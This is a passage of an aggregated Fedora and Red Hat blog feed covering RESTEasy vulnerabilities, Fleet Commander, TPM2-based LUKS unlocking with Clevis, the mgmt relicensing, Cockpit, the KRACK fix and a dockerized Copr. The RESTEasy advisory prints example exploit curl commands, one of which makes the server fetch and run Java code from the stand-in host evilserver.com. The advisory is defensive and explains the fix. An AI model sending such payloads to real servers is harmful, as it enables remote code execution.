    writer.EndObject();
    writer.EndObject();
    subdoc.Parse(s.GetString());         // parse the string written to the buffer to form a sub-DOM

    d.AddMember("testing", subdoc, d.GetAllocator()); // attach the sub-DOM to the main DOM object
    d["f"] = true;
    d["t"].SetBool(false);
}

Happy Coding! Cheers.

Further reading:
https://stackoverflow.com/questions/32896695/rapidjson-add-external-sub-document-to-document


Abuse of RESTEasy Default Providers in JBoss EAP

Posted by Red Hat Security on October 18, 2017 01:30 PM

Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for RESTful web services. A powerful but potentially dangerous feature of RESTful web services on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process a request with the default provider matching the Content-Type HTTP header that the client specifies. Some of the default providers were found to have vulnerabilities, which have now been removed from JBoss EAP and its upstream RESTful web service project, RESTEasy.

The attack vector

There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing one of the following:

  • @Consumes annotation was present specifying wildcard mediaType {*/*}
  • @Consumes annotation was not present on webservice endpoint
  • Webservice endpoint consumes a multipart mediaType

Here's an example of what a vulnerable webservice would look like:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

        @POST
        @Path("/concat")
        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;
        }

}

Notice how there is no @Consumes annotation on the doConcat method.

The vulnerabilities

CVE-2016-7050 took advantage of the deserialization capabilities of the SerializableProvider. It was fixed upstream [1] before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

If a RESTful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending an HTTP request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializableProvider and could contain a malicious payload generated with ysoserial [2] or similar. Remote code execution on the server could occur as long as there was a gadget chain on the classpath of the web service application.

Here's an example:

curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'

CVE-2016-9606 also exploited the default providers of RESTEasy. This time the YamlProvider was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget-chain library on the classpath. Instead, the SnakeYAML library used by RESTEasy was exploited directly to achieve remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

SnakeYAML allows loading classes with a URLClassLoader, using its ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading and executing that Java code.

An example of a malicious request is as follows:

curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat

Here evilserver.com is a host controlled by the malicious actor.

Again, you can see the use of the Content-Type HTTP header, which tricks RESTEasy into using the YamlProvider, even though the developer didn't intend for it to be accessible.

How to stay safe

The latest versions of EAP 6.4.x and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but we found it was possible to exploit on 7.1, and it is now fixed in the 7.1.0.Beta release. CVE-2016-7050 didn't affect either EAP 6.4.x or 7.0.x.

If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

        @POST
        @Path("/concat")
        @Consumes("application/json")
        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;
        }

}

Notice that this safe version added a @Consumes annotation with a media type of application/json.

This is good practice anyway, because if an HTTP client tries to send a request with a different Content-Type HTTP header, the application will give an appropriate error response, indicating that the Content-Type is not supported.


  1. https://issues.jboss.org/browse/RESTEASY-1269 

  2. https://github.com/frohoff/ysoserial 


Fleet Commander ready for takeoff!

Posted by Christian F.K. Schaller on October 18, 2017 12:01 PM

Alberto Ruiz just announced Fleet Commander as production ready! Fleet Commander is our new tool for managing large deployments of Fedora Workstation and RHEL desktop systems. So head over to Alberto's Fleet Commander blog post for all the details.

Fleet Commander: production ready!

Posted by Alberto Ruiz on October 18, 2017 11:56 AM

It’s been a while since I last wrote any updates about Fleet Commander; that’s not to say that there hasn’t been any progress since 0.8. In many senses we (Oliver and I) feel like we should present Fleet Commander as a shiny new project now, as many changes have gone in and this is the first release we feel is robust enough to call production ready.

What is Fleet Commander?

For those missing some background, let me introduce Fleet Commander: Fleet Commander is an integrated solution for large Linux desktop deployments that provides a centrally controlled configuration management interface covering desktop, application and network configuration. For people familiar with Group Policy Objects in Active Directory on Windows, it is very similar.

Many people ask why not use other popular Linux configuration management tools like Ansible or Puppet. The answer is simple: those are designed for servers that run in a controlled environment like a data center or the cloud. They follow a push model, where configuration changes happen as a series of commands run on the server; if something goes wrong, it is easy to audit and roll back if you have access to that server. However, desktop machines in large corporate environments often run behind a NAT on a public WiFi network; think of a laptop owned by an on-site support engineer who roams from site to site. Fleet Commander pulls a bundle of configuration data and makes it available to apps without running intrusive shell scripts or walking into users’ $HOME directories. Ansible and Puppet did not solve the core problems of desktop session configuration management, so we had to create something new.

At Red Hat we talk to many enterprise desktop customers with a mixed environment of Windows, Macs and Linux desktops and our interaction with them has helped us identify this gap in the GNOME ecosystem and motivated us to roll up our sleeves and try to come up with an answer.

How to build a profile

The way Fleet Commander builds profiles is somewhat interesting compared to its competitors. Our solution is inspired by the good old Sabayon tool. In our admin web UI you get a VM desktop session where you run and configure your apps; Fleet Commander records those changes and lists them. The user selects among them, and the final selection is bound together as part of the profile.

You can then apply the profile to individual users, groups, hosts or host groups.

[Screenshot: reviewing changes recorded in the live session]

Supported apps/settings

Right now we support anything dconf-based (GSettings), GNOME Online Accounts, LibreOffice and NetworkManager. In the near future we plan to tackle our main gap, which is browser support; we will probably start with just bookmarks, as it is the most demanded use case.

Cockpit integration

[Screenshot: Fleet Commander loading screen in Cockpit]

The Fleet Commander UI runs on top of the Cockpit admin UI. Cockpit has given us a lot of stuff for free (a basic UI framework, a web service, and built-in websocket support for our SPICE JavaScript client, among many other things).

FreeIPA Integration

A desktop configuration management solution has to be tightly tied to an identity management solution (as in Active Directory). FreeIPA is the best free software corporate identity management project out there, and integrating with it allowed us to remove quite a bit of complexity from our code base while improving security. FreeIPA now stores the profile data and the assignments to users, groups and hosts.

SSSD

SSSD is the client daemon that enrolls and authenticates a Linux machine in a FreeIPA or Active Directory domain. Having Fleet Commander hook into it was a perfect fit for us, and it also allowed us to remove a bunch of code from previous versions while producing a much more robust implementation. SSSD now retrieves and stores the profile data from FreeIPA.

fleet-commander.org

Our new website is live! We have updated introduction materials and documentation, and jimmac has put together a great design and layout. Check it out!
I’d like to thank Alexander Bokovoy and Fabiano Fidencio for their invaluable help extending FreeIPA and SSSD to integrate with Fleet Commander, and Jakub for his help on the website design. If you want to know more, join us on our IRC channel (#fleet-commander @ freenode) and our GitHub project page.

It is currently available in Fedora 26 and we are in the process of releasing EPEL packages for CentOS/RHEL.

Automatic LUKS volumes unlocking using a TPM2 chip

Posted by Javier Martinez Canillas on October 18, 2017 08:59 AM

I joined Red Hat a few months ago, and have been working on improving the Trusted Platform Module 2.0 (TPM2) tooling, working toward better TPM2 support in Fedora on UEFI systems.

For brevity I won’t explain in this post what TPMs are and their features, but assume that readers are already familiar with trusted computing in general. Instead, I’ll explain what we have been working on, the approach used and what you might expect on Fedora soon.

For an introduction to TPMs, I recommend Matthew Garrett’s excellent posts about the topic, Philip Tricca’s presentation about TPM2 and the official Trusted Computing Group (TCG) specifications. I also found the “A Practical Guide to TPM 2.0” book to be much easier to digest than the official TCG documentation. The book is an open access one, which means it’s freely available.

LUKS volumes unlocking using a TPM2 device

Encryption of data at rest is a key component of security.  LUKS provides the ability to encrypt Linux volumes, including both data volumes and the root volume containing the OS. The OS can provide the crypto keys for data volumes, but something has to provide the key for the root volume to allow the system to boot.

The most common way to provide the crypto key to unlock a LUKS volume is to have a user type in a LUKS pass-phrase during boot. This works well for laptop and desktop systems, but is not well suited for servers or virtual machines, since it is an obstacle to automation.

So the first TPM feature we want to add to Fedora (and likely one of the most common use cases for a TPM) is the ability to bind a LUKS volume master key to a TPM2. That way the volume can be automatically unlocked (without typing a pass-phrase) by using the TPM2 to obtain the master key.

A key point here is that the actual LUKS master key is not present in plain text form on the system, it is protected by TPM encryption.

Also, by sealing the LUKS master key with a specific set of Platform Configuration Registers (PCR), one can make sure that the volume will only be unlocked if the system has not been tampered with. For example (as explained in this post), PCR7 is used to measure the UEFI Secure Boot policy and keys. So the LUKS master key can be sealed against this PCR, to avoid unsealing it if Secure Boot was disabled or the used keys were replaced.

Implementation details: Clevis

Clevis is a pluggable framework for automated decryption that has a number of “pins”, where each pin implements {en,de}cryption support using a different backend. It also has a command line interface to {en,de}crypt data using these pins, create complex security policies, and bind a pin to a LUKS volume to later unlock it.

Clevis relies on the José project, which is a C implementation of the Javascript Object Signing and Encryption (JOSE) standard. It also uses the LUKSMeta project to store Clevis pin metadata in a LUKS volume header.

On encryption, a Clevis pin takes some data to encrypt and a JSON configuration, and produces a JSON Web Encryption (JWE) content. This JWE contains the data encrypted using a JSON Web Key (JWK) plus information on how to obtain the JWK for decryption.

On decryption, the Clevis pin obtains a JWK using the information provided by a JWE and decrypts the ciphertext also stored in the JWE using that key.

Each Clevis pin defines its own JSON configuration format: how the JWK is created, where it is stored and how to retrieve it.

As mentioned, Clevis has support for binding a pin to a LUKS volume. This means that the LUKS master key is encrypted using a pin and the resulting JWE is stored in a LUKS volume meta header. That way Clevis is able to later decrypt the master key and unlock the LUKS volume. Clevis has dracut and udisks2 support to do this automatically, and the next version of Clevis will also include a command line tool to unlock non-root (data) volumes.

Clevis TPM2 pin

Clevis provides a mechanism to automatically supply the LUKS master key for the root volume. The initial implementation of Clevis had support for obtaining the LUKS master key from a network service, but we have extended Clevis to take advantage of a TPM2 chip, which is available on most servers, desktops and laptops.

By using a TPM, the disk can only be unlocked on a specific system: it will neither boot nor be accessible on another machine.

This implementation also works with UEFI Secure Boot, which will prevent the system from being booted if the firmware or system configuration has been modified or tampered with.

To make use of all the Clevis infrastructure and also be able to use the TPM2 as a part of more complex security policies, the TPM2 support was implemented as a clevis tpm2 pin.

On encryption, the tpm2 pin generates a JWK, creates an object in the TPM2 with the JWK as sensitive data, and binds the object to the TPM2 (or seals it, if a PCR set is defined in the JSON configuration).

The generated JWE contains both the public and wrapped sensitive portions of the created object, as well as information on how to unseal it from the TPM2 (hashing and key encryption algorithms used to recalculate the primary key, PCR policy for authentication, etc).

On decryption, the tpm2 pin takes the JWE that contains both the sealed object and information on how to unseal it, loads the object into the TPM2 by using the public and wrapped sensitive portions, and unseals the JWK to decrypt the ciphertext stored in the JWE.

The changes haven’t been merged yet because the pin uses features from tpm2-tools master, so we have to wait for the next release of the tools. There are also still discussions on the pull request about some details, but it should be ready to land soon.

Usage

The Clevis command line tools can be used to encrypt and decrypt data using a TPM2 chip. The tpm2 pin has reasonable defaults, but one can configure most of its parameters using the pin's JSON configuration (refer to the Clevis tpm2 pin documentation for these), e.g.:

$ echo foo | clevis encrypt tpm2 '{}' > secret.jwe

And then the data can later be decrypted with:

$ clevis decrypt < secret.jwe
foo

To seal data against a set of PCRs:

$ echo foo | clevis encrypt tpm2 '{"pcr_ids":"8,9"}' > secret.jwe

And to bind a tpm2 pin to a LUKS volume:

$ clevis luks bind -d /dev/sda3 tpm2 '{"pcr_ids":"7"}'

The LUKS master key is not stored in raw format; instead it is wrapped with a JWK that has the same entropy as the LUKS master key. It is this JWK that is sealed with the TPM2.

Since Clevis has both dracut and udisks2 hooks, the command above is enough to have the LUKS volume be automatically unlocked using the TPM2.

The next version of Clevis also has a clevis-luks-unlock command line tool, so a LUKS volume could be manually unlocked with:

$ clevis luks unlock -d /dev/sda3

Using the TPM2 as a part of more complex security policies

One of Clevis' supported pins is the Shamir Shared Secret (SSS) pin, which allows encrypting a secret using a JWK that is then split into different parts. Each part is then encrypted using another pin, and a threshold is chosen to decide how many parts are needed to reconstruct the encryption key, so the secret can be decrypted.

This allows, for example, splitting the JWK used to wrap the LUKS master key into two parts. One part of the JWK could be sealed with the TPM2 and the other part stored on a remote server. By sealing a JWK that is only one part of the key needed to decrypt the LUKS master key, an attacker obtaining the data sealed in the TPM won't be able to unlock the LUKS volume.

The Clevis encrypt command for this particular example would be:

$ clevis luks bind -d /dev/sda3 sss '{"t": 2, "pins": \
  {"http":{"url":"http://server.local/key"}, "tpm2": \
  {"pcr_ids":"7"}}}'

Limitations of this approach

One problem with the current implementation is that Clevis is a user-space tool, so it can't be used to unlock a LUKS volume that contains an encrypted /boot directory. The boot partition still needs to remain unencrypted so the bootloader is able to load a Linux kernel and an initramfs containing Clevis, which then unlocks the encrypted LUKS volume for the root partition.

Since the initramfs is not signed on a Secure Boot setup, an attacker could replace the initramfs and unlock the LUKS volume. So the threat model this protects against is an attacker who can get access to the encrypted volume but not to the trusted machine.

There are different approaches to solving this limitation. The previously mentioned post from Matthew Garrett suggests having a small initramfs that's built into the signed Linux kernel. The only task for this built-in initramfs would be to unseal the LUKS master key, store it in the kernel keyring and extend PCR7 so the key can't be unsealed again. Later, the usual initramfs can unlock the LUKS volume by using the key already stored in the Linux kernel.

Another approach is to also have the /boot directory in an encrypted LUKS volume and add support for the bootloader to unseal the master key with the TPM2, for example by supporting the same JWE format in the LUKS meta header that Clevis uses. That way only a signed bootloader would be able to unlock the LUKS volume that contains /boot, so an attacker wouldn't be able to tamper with the system by replacing the initramfs, since it would be in an encrypted partition.

But there is work to be done for both approaches, so it will take some time until we have protection for this threat model.

Still, having an encrypted root partition that is only automatically unlocked on a trusted machine has many use cases. To list a few examples:

  • Stolen physical disks or virtual machines images can’t be mounted on a different machine.
  • An external storage medium can be bound to a set of machines, so it can be automatically unlocked only on trusted machines.
  • A TPM2 chip can be reset before sending a laptop in for repair; that way the LUKS volume can't be automatically unlocked anymore.
  • An encrypted volume can be bound to a TPM2 when there is no risk of someone having physical access to the machine, and unbound again when there is. That way the machine can be automatically unlocked in safe places but require a pass-phrase in unsafe ones.

Acknowledgements

I would like to thank Nathaniel McCallum and Russell Doty for their feedback and suggestions for this article.


Copyleft is Dead. Long live Copyleft!

Posted by James Just James on October 18, 2017 01:22 AM

As you may have noticed, we recently re-licensed mgmt from the AGPL (Affero General Public License) to the regular GPL. This post explains the decision and hopefully includes some insights at the intersection of technology and legal issues.

Disclaimer:

I am not a lawyer, and these are not necessarily the opinions of my employer. I think I’m knowledgeable in this area, but I’m happy to be corrected in the comments. I’m friends with a number of lawyers, and they like to include disclaimer sections, so I’ll include this so that I blend in better.

Background:

It’s well understood in infrastructure coding that control of, and trust in, the software is paramount. It can be risky to base your business on a product if the vendor has the ultimate ability to change its behaviour, discontinue the software, make it prohibitively expensive, or, in the extreme case, use it as a backdoor for corporate espionage.

While many businesses have realized this, it’s unfortunate that many individuals have not. The difference might be protecting corporate secrets vs. individual freedoms, but that’s a discussion for another time. I use Fedora and GNOME, and don’t have any Apple products, but you might value the temporary convenience more. I also support your personal choice to use the software you want. (Not sarcasm.)

This is one reason why Red Hat has done so well. If they ever mistreated their customers, the customers would be able to fork the code and grow new communities. The lack of an asymmetrical power dynamic keeps customers feeling safe and happy!

Section 13:

The main difference between the AGPL and the GPL is the “Remote Network Interaction” section. Here’s a simplified explanation:

Both licenses require that if you modify the code, you give back your contributions. “Copyleft” is the part of copyright law that legally requires this share-alike provision. Neither license requires this when the software is used privately, whether by an individual or within a company. The thing that “activates” the licenses is distribution: if you sell or give someone a modified copy of the program, then you must also include the source code.

The AGPL extends the GPL in that it also activates the license if that software runs on an application provider's computer, which is common with hosted software-as-a-service. In other words, if you were an external user of a web calendaring solution containing AGPL software, then that provider would have to offer up the code to the application. The GPL would not require this, and neither license requires distribution of code if the application is only available to employees of that company, nor would either require distribution of the software used to deploy the calendaring software.

Network Effects and Configuration Management:

If you’re familiar with the infrastructure automation space, you’re probably already aware of three interesting facts:

  1. Hosted configuration management as a service probably isn’t plausible
  2. The infrastructure automation your product uses isn’t the product
  3. Copyleft does not apply to the code or declarations that describe your configuration

As a result, it's unlikely that the Section 13 requirement of the AGPL would ever actually apply to anyone using mgmt!

A number of high-profile organizations outright forbid the use of the AGPL. Google and OpenStack are two notable examples; there are others. Many claim this is because the cost of legal compliance is high. One argument I heard is that they live in fear that their entire proprietary software development business would be turned on its head if some sufficiently important library were AGPL. Despite weak enforcement, and with many companies flouting the GPL, Linux and the software industry have shown no signs of waning. Compliance has even helped their bottom line.

Nevertheless, as a result of misunderstanding, fear and doubt, using the AGPL still cuts off a portion of your potential contributors. Possibly overzealous enforcement has also caused some to fear the GPL.

Foundations and Permissive Licensing:

Why use copyleft at all? Copyleft is an inexpensive way of keeping the various contributors honest. It provides an organizational constitution so that community members who invest in the project all get a fair, representative stake.

In the corporate world, there is a lot of governance in the form of “foundations”. The most well-known ones exist in the United States and are usually classified as 501(c)(6) under US Federal tax law. They aren't allowed to generate a profit, but they exist to fulfill the desires of their dues-paying membership. You've probably heard of the Linux Foundation, the .NET Foundation, the OpenStack Foundation, and the recent Linux Foundation child, the CNCF. With the major exception of Linux, they primarily fund permissively licensed projects, since that's what their members demand, and the foundation probably also helps convince some percentage of their membership to voluntarily contribute code back.

Running an organization like this is possible, but it certainly adds a layer of overhead that I don’t think is necessary for mgmt at this point.

It’s also interesting to note that among the top corporate contributions to open source, virtually all of the licensing is permissive, usually under the Apache v2 license. I’m not against using or contributing to permissively licensed projects, but I do think there’s a danger if most of our software becomes a non-copyleft monoculture, and I wanted to take a stand against that trend.

Innovation:

I started mgmt to show that there was still innovation to be done in the automation space, and I think I’ve achieved that. I still have more to prove, but I think I’m on the right path. I also wanted to innovate in licensing by showing that the AGPL isn’t actually harmful. I’m sad to say that I’ve lost that battle, and maybe it was too hard to innovate in too many different places simultaneously.

Red Hat has been my main source of funding for this work up until now, and I’m grateful for that, but I’m sad to say that they’ve officially set my time quota to zero. Without their support, I just don’t have the energy to innovate in both areas. I’m sad to say it, but I’m more interested in the technical advancements than I am in the licensing progress it might have brought to our software ecosystem.

Conclusion / TL;DR:

If you, your organization, or someone you know would like to help fund my mgmt work either via a development grant, contract or offer of employment, or if you’d like to be a contributor to the project, please let me know! Without your support, mgmt will die.

Happy Hacking,

James

You can follow James on Twitter for more frequent updates and other random noise.

EDIT: I mentioned in my article that “Hosted configuration management as a service probably isn’t plausible”. It turns out I was wrong. The splendiferous Nathen Harvey was kind enough to point out that Chef offers a hosted solution! It’s free for five hosts, as well!

I was probably thinking more about how I would be using mgmt, and not about the greater ecosystem. If you’d like to build or use a hosted mgmt solution, please let me know!


How to live without Google

Posted by Fernando Espinoza on October 17, 2017 05:56 PM

Remove Google from your life? Yes, it can be done! Google trackers have been found on 75% of the top million websites. This means they not only track what you search for; they also track the websites you visit and use all your data for the ads that follow you around the Internet. Your personal data... Continue reading →


Cockpit 153

Posted by Cockpit Project on October 17, 2017 10:00 AM

Cockpit is the modern Linux admin interface. We release regularly. Here are the release notes from version 153.

Add oVirt package

This version introduces the “oVirt Machines” page on Fedora for controlling oVirt virtual machine clusters. This code was moved into Cockpit as it shares a lot of code with the existing “Machines” page, which manages virtual machines through libvirt.

This feature is packaged as cockpit-ovirt, and when installed it replaces the “Machines” page.

oVirt overview

Packaging cleanup

This release fixes a lot of small packaging issues that were spotted by rpmlint/lintian.

Try it out

Cockpit 153 is available now.
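
If you want to try it on Fedora, one common route (my addition here, not part of the original release notes) is to install the package and enable its socket, then browse to https://localhost:9090:

sudo dnf install cockpit
sudo systemctl enable --now cockpit.socket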

Protect your wifi on Fedora against KRACK

Posted by Fedora Magazine on October 17, 2017 12:23 AM

You may have heard about KRACK (for “Key Reinstallation Attack”), a vulnerability in WPA2-protected Wi-Fi. This attack could let attackers decrypt, forge, or steal data, despite WPA2’s improved encryption capabilities. Fear not — fixes for Fedora packages are on their way to stable.

Guarding against KRACK

New wpa_supplicant packages contain the fix for Fedora 25, 26, and 27, as well as Rawhide. The maintainers have submitted them to the stable repos. They should show up within a day or so for most users.

To update your Fedora system, use this command once you configure sudo. Type your password at the prompt, if necessary.

sudo dnf update wpa_supplicant

Fedora provides worldwide mirrors at many download sites to better serve users. Some sites refresh their mirrors at different rates. If you don’t get an update right away, wait until later in the day.

Updating immediately

If you’re worried about waiting until stable updates show up, use this process to get the packages. First, install the bodhi-client package:

sudo dnf install bodhi-client

Then note the build ID for your Fedora system:

  • Fedora 27 prerelease: wpa_supplicant-2.6-11.fc27
  • Fedora 26: wpa_supplicant-2.6-11.fc26
  • Fedora 25: wpa_supplicant-2.6-3.fc25.1

Now download the packages for your system and update them. This example is for Fedora 26:

mkdir ~/krack-update && cd ~/krack-update
bodhi updates download --builds wpa_supplicant-2.6-11.fc26
dnf update ./wpa_supplicant*.rpm

If your system is on Rawhide, run sudo dnf update to get the update.
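
To confirm that the fixed build landed on your system (a quick check of my own, not from the original article), query the installed version and compare it with the list above:

rpm -q wpa_supplicant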

Copr stack dockerized!

Posted by Jakub Kadlčík on October 17, 2017 12:00 AM

Lately, I decided to dockerize the whole Copr stack and utilize it for development. It is quite nifty and just ridiculously easy to use. In this article, I want to show you how to run it, describe what is inside the containers and explain my personal workflow.

There are no special prerequisites; you only need a properly configured docker daemon and the docker-compose command installed.

Usage

Have I already said that it is ridiculously easy to use? Just run the following command in the copr root directory.

docker-compose up -d

It builds images for all Copr services and runs containers from them. Once it is done, you should be able to open http://127.0.0.1:5000 and successfully build a package in it.

How so?

There is a docker-compose.yaml file in the copr root directory, which describes all the Copr services and ties them together. At this point, we have a frontend, distgit, backend and database. This may change in the future by splitting the functionality across more containers.

The copr repository also contains a directory called docker with the corresponding Dockerfile for each service.

All the images are built in the same way. First, the whole copr repository is copied in. Then tito is used to build the appropriate package for the service, which is installed, configured and started. The only exception is the database, which just sets up a simple PostgreSQL server.

The parent process for the services running in the containers is supervisord, so they can be controlled via the supervisorctl command.

A live version of the copr repository is also bind-mounted into the containers at /opt/copr.
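
As a side note, here is a pattern I find handy (my own habit, not something the compose file mandates): after changing a service’s Dockerfile, rebuild and restart just that one container instead of the whole stack:

# rebuild the image for one service, then recreate only its container
docker-compose build frontend
docker-compose up -d --no-deps frontend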

Cheat sheet

How can I see running containers?

docker-compose ps

Why didn’t a container start as expected?

docker-compose logs --follow

How can I open a shell in the container?

docker exec -it <name> bash

How can I see running services in the container?

supervisorctl status

How can I control services in the container?

supervisorctl start/stop/restart all/<name>

How can I throw away changes that I made inside a container?

docker-compose up -d --force-recreate <service>

My personal workflow

Are you familiar with utilizing containers for development? Then you can stop reading here. This section describes my personal preferences, and you might not endorse them. That is fine; I am not trying to force you to do it my way. However, I think it is a good idea to describe them, so new team members (or even the current ones) can take inspiration from them. Also, if everyone described their setup, we would be clear on what we need to support.

If you haven’t read the post about my Vagrant setup, you should do so. The workflow remains exactly the same, just the tools have changed. Let’s take the frontend as an example.

Once we have a running container for the frontend, we can open a shell in it and do

supervisorctl stop httpd
python /opt/copr/frontend/coprs_frontend/manage.py runserver -p 80 -h 0.0.0.0

to stop the service from a pre-installed package and run a built-in server from the live code. It allows us to try uncommitted changes (duh) or use tools like ipdb.

Alternatively, for distgit, we can use

supervisorctl stop copr-dist-git
PYTHONPATH=/opt/copr/dist-git /opt/copr/dist-git/run/importer_runner.py

Resources

  1. https://developer.fedoraproject.org/tools/docker/about.html
  2. https://docs.docker.com/compose/overview/
  3. https://devcenter.heroku.com/articles/local-development-with-docker-compose

Linux Autumn 2017

Posted by Rafał Lużyński on October 16, 2017 11:01 PM


Linux Autumn is an annual Polish conference dedicated to free software and GNU/Linux. This year marked its 15th edition, which was held in the Muflon Leisure Center in Ustroń.

In short: the conference was interesting, but my participation was limited due to a virus¹ attack.

Day #1: September 22

Not much was planned for that day because the attendees were still arriving. The event started at 4 PM and the first speaker was Igor Gnatenko from Red Hat. He talked about dependencies between packages, especially the new kinds of dependencies added in RPM 4.14. I was a little late to this talk, but thanks to YouTube I know what it was like and I must admit that it was interesting. I like the idea of a talk which focuses on a small subject that does not require advanced skills to understand, and at the same time provides important information to the attendees. It is worth mentioning here as it was the only talk in English:

Video: https://www.youtube.com/watch?v=ux2lN-KsMxI

Video: https://www.youtube.com/watch?v=HB-spEtBpCo

The second speaker was myself. I talked about preparing an application for internationalization and avoiding typical errors. How it went, you should judge for yourself. Unfortunately, this talk and all the others were in Polish, and no English translations exist, so I don’t provide links here.

My talk about preparing an application for internationalization. Photo: Igor Gnatenko.

In the evening there was a dinner and long conversation about professional and non-professional subjects.

Day #2: September 23

In the morning I woke up with a sore throat and I knew that the conference was effectively over for me. Luckily, I had given my talk the previous day, when I still felt good. Despite this I pulled myself together and attended all the talks. I’d like to mention the two most interesting ones, in my opinion. The first was Maciej Nabożny‘s talk about his libdinemic project. He touched on many subjects, like cryptography and certificates, but above all Maciej comprehensibly explained how blockchain works and how it powers Bitcoin. The second talk was by Dariusz Puchalak, about OpenSSH, Ansible and other network tools. Usually I’m less interested in administrative topics than in programming, but Dariusz’s talk was really lively and impressed me. I recommend his talks to everyone; he is a really great speaker.

Piotr Kliczewski from Red Hat talks about oVirt

Day #3: September 24

So this was really the end for me. During the night I had a fever; shortly after breakfast I packed my things, said goodbye and went back home. I wish I could recommend watching the videos on YouTube, but unfortunately they are mostly in Polish. Please come next year: the more foreign speakers and attendees we have, the more likely we are to switch to English.

PS. Regarding the virus, as usually happens, the next day I felt much better and two days later I was quite well.


¹ Virus: a biological structure similar to but unrelated to computer viruses. They attack the cells of living organisms and are totally safe for computers.

What I have found interesting in Fedora during the week 41 of 2017

Posted by Fedora Community Blog on October 16, 2017 06:49 PM

After a week I would like to share some activities which happened during the past week:

Fedora 27 Server Beta is No-Go

On Thursday, 2017-Oct-12, we had a Go/No-Go meeting for the delayed F27 Beta release of the Server (modular) edition. The result of the meeting was No-Go due to a missing Release Candidate compose. We are going to run another round of the Go/No-Go meeting on Thursday, 2017-Oct-19 at 17:00 UTC, where we will determine the readiness of the F27 Server edition for the Beta release. On Friday, 2017-Oct-13, FESCo allowed use of the Rain/Target date scheduling for the F27 Server Beta, so even if we slip the F27 Server Beta by one week, the Final F27 Server release is not affected, for now.

New OpenStack SIG

Haïkel has announced a new SIG focused on OpenStack.

Firefox 57 update

The planned update of the Firefox browser to version 57 seems to have provoked interesting discussions on the devel@ mailing list (“Why is Fx 57 in Updates Testing?“, “Call for testing – Firefox 57“) and was even brought to FESCo. Reading the whole discussion reminds me how difficult it is to balance between the latest updates and stability.

And of course, the list above is not exhaustive and there is much more going on in the Fedora community. It just summarizes some tasks which have drawn my attention.


The post What I have found interesting in Fedora during the week 41 of 2017 appeared first on Fedora Community Blog.

Episode 66 - Objects in mirror are less terrible than they appear

Posted by Open Source Security Podcast on October 16, 2017 03:59 PM
Josh and Kurt talk about Equifax again, Kaspersky, TLS CAs, coming change, social security numbers, and Minecraft.


Listen: http://html5-player.libsyn.com/embed/episode/id/5840636/

Show Notes



Shaking the tin for LVFS: Asking for donations!

Posted by Richard Hughes on October 16, 2017 03:50 PM

tl;dr: If you feel like you want to donate to the LVFS, you can now do so here.

Nearly 100 million files are downloaded from the LVFS every month, the majority being metadata to know what updates are available. Although each metadata file is very small, it still adds up to over 1TB in transferred bytes per month. Amazon has kindly given the LVFS a 2000 USD per year open source grant, which more than covers the hosting costs and any test EC2 instances. I really appreciate the donation from Amazon as it allows us to continue to grow, both with the number of Linux clients connecting every hour, and with the number of firmware files hosted. Before the grant, sometimes Red Hat would pay the bandwidth bill, and other times it was just paid out of my own pocket, so the grant does mean a lot to me. Amazon seemed very friendly towards this kind of open source shared infrastructure, so kudos to them for that.

At the moment the secure part of the LVFS is hosted in a dedicated Scaleway instance, so any additional donations would be spent on paying this small bill and perhaps more importantly buying some (2nd hand?) hardware to include as part of our release-time QA checks.

I already test fwupd with about a dozen pieces of hardware, but I’d feel a lot more comfortable testing different classes of device with updates on the LVFS.

One thing I’ve found that also works well is taking a chance and buying a popular device we know is upgradable and adding support for the specific quirks it has to fwupd. This is an easy way to get karma from a previously Linux-unfriendly vendor before we start discussing uploading firmware updates to the LVFS. Hardware on my wanting-to-buy list includes a wireless network card, a fingerprint scanner and SSDs from a couple of different vendors.

If you’d like to donate towards hardware, please donate via LiberaPay or ask me for PayPal/BACS details. Even if you donate €0.01 per week it would make a difference. Thanks!

Upgrade Fedora Workstation to Fedora 27 Beta

Posted by Fedora Magazine on October 16, 2017 08:00 AM

In case you missed the news, Fedora 27 Beta was released last week. If you’re running Fedora Workstation, it’s easy to upgrade to the Beta release. Then you can try out some of the new features early. This article explains how.

Some helpful advice

The Fedora 27 Beta is still just what it says it is: a beta. That means some features are still being tuned up before the final release. However, it works well for many users, especially those who are technically skilled. You might be one of them. Before you upgrade, here are some things to keep in mind.

First, back up your user data. While there are no problems currently known that would risk your data, it’s a good idea to have a recent backup for safety.

Second, remember this process downloads all the update data over your internet connection. It will take some time, based on your connection speed. Upgrading the system also requires a reboot, and takes some time to install the updated packages. Don’t perform this operation unless you have time to wait for it to finish.

